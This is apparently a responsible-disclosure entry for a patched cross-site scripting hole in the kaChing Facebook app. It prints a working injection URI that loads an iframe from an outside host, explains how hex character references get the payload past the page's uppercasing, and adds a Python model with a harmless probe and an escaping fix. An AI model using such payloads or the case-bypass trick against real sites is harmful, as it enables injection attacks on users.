Facebook Verified Application
Current Monthly Active Users: 28,778
Current Rank on Application Leaderboard: 963
Application Developer: kaChing Group, Inc.
Responsiveness: I received an e-mail from kaChing saying the patch was fixed about six hours after notifying them.
Vulnerability Status: Patched
Capable of Clickjacking Install: Uncertain
Example URI: http://apps.facebook.com/kaching/portfolio/trade?symbol=%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fwww.kaching.com%2F%26%23×66%3B%26%23×62%3B%2F%26%23×70%3B%26%23×6F%3B%26%23×72%3B%26%23×74%3B%26%23×66%3B%26%23×6F%3B%26%23×6C%3B%26%23×69%3B%26%23×6F%3B%2F%26%23×74%3B%26%23×72%3B%26%23×61%3B%26%23×64%3B%26%23×65%3B%3F%26%23×73%3B%26%23×79%3B%26%23×6D%3B%26%23×62%3B%26%23×6F%3B%26%23×6C%3B%3D%253Ciframe%2Bsrc%253D%2522http%253A%252F%252Ffbl.li%252Fr%252F%2522%253E%22%3E
Notes: This hole was very straightforward, but fully exploiting it required one more trick. Since the injected parameter was a stock symbol, the resulting page would automatically capitalize the input when displaying an error message. That meant that the injected URI became uppercase when it needed to be lowercase. To combat that issue, I converted the text parts of the URI to hex encodings, then had to encode those values for a URI. All these steps resulted in the rather lengthy URI above, which did preserve capitalization.
P.S. Those should be lowercase x’s in the example URI.
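To show why the uppercasing on this error page was no defence, and what the actual fix looks like, here is an added Python model (not kaChing's or Facebook's code). It assumes a hypothetical sink that uppercases the symbol and reflects it unescaped into an HTML error message, and uses a harmless link as the probe instead of the page's payload.

```python
import html
from html.parser import HTMLParser

# Hypothetical stand-in for the vulnerable sink (constructed here, not kaChing's
# code): the requested symbol is uppercased and reflected, unescaped, into an
# HTML error message.
def render_error_vulnerable(symbol: str) -> str:
    return f'<p class="error">No such symbol: {symbol.upper()}</p>'

# Hardened sink: escape for the HTML text context before reflecting. Because
# '&' becomes '&amp;', character references in the input are shown literally,
# so the uppercasing step neither helps nor hurts.
def render_error_fixed(symbol: str) -> str:
    return f'<p class="error">No such symbol: {html.escape(symbol.upper())}</p>'

def to_hex_refs(text: str) -> str:
    """Encode each character as an HTML hex character reference (&#x..;).
    The 'x' and the hex digits are case-insensitive, so a reference that has
    been uppercased (&#X6F;) still decodes to the original lowercase letter."""
    return "".join(f"&#x{ord(ch):x};" for ch in text)

class _TagCollector(HTMLParser):
    """Sees markup the way a browser does: tag and attribute names lowercased,
    character references inside attribute values resolved."""
    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def injected_links(markup: str) -> list:
    """Return the href of every <a> element present in the rendered markup."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return [attrs.get("href") for tag, attrs in parser.tags if tag == "a"]

# Constructed, harmless probes: a link whose path is case-sensitive, once as
# plain text and once with the path written as hex character references.
PLAIN_PROBE = '<a href="http://example.invalid/path/lower">x</a>'
REF_PROBE = '<a href="http://example.invalid' + to_hex_refs("/path/lower") + '">x</a>'

if __name__ == "__main__":
    print(injected_links(render_error_vulnerable(PLAIN_PROBE)))  # path uppercased
    print(injected_links(render_error_vulnerable(REF_PROBE)))    # path preserved
    print(injected_links(render_error_fixed(REF_PROBE)))         # no link at all
```

The plain probe lands as a tag but its path is mangled to uppercase, the entity-encoded probe keeps its lowercase path, and the escaped sink reflects neither as markup.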